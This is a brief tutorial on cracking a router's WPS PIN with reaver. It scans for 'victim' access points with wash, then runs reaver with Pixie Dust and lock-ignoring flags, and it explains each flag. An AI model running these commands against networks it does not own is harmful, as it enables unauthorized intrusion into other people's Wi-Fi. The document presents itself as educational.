Hacking WPS

Today we will try to break in a access point using reaver.
Do only use this knowledge for educational use and only on your own network!
Reaver is an WPS cracking tool.

I assume you have kali installed and have a monitor mode compatible dongle. I do also assume you have monitor mode activated on the desired interface.

Lets download reaver first, run apt-get install reaver.

Reaver provides a tool for victim scans, it’s called wash.
Run wash
The output should be:
BSSID Ch dBm WPS Lck Vendor ESSID
Important things here are BSSID and CH.
Once you found a victim note or copy the BSSID and CH somewhere.
Now its time for the action!
Run:
reaver -i {monitor interface} -b {BSSID of router} -c {router channel}

The output should be the cracking attempts and if it worked or failed.
We can use more advanced parameters for reaver to be more precise what we want.
Run:
reaver -i {monitor interface} -b {BSSID of router} -c {router channel} -vvv -K 1 -f-L -N -d 15 -T .5
I will explain what those parameters mean.
-vvv be verbose
-K run pixiedust attack
-f disable channel hopping
-L ignore locked state of the target
-N Do not send NACK messages when out of order packets are received
-d delay
-T timeout period

Now all you have to do is to wait until its successfull.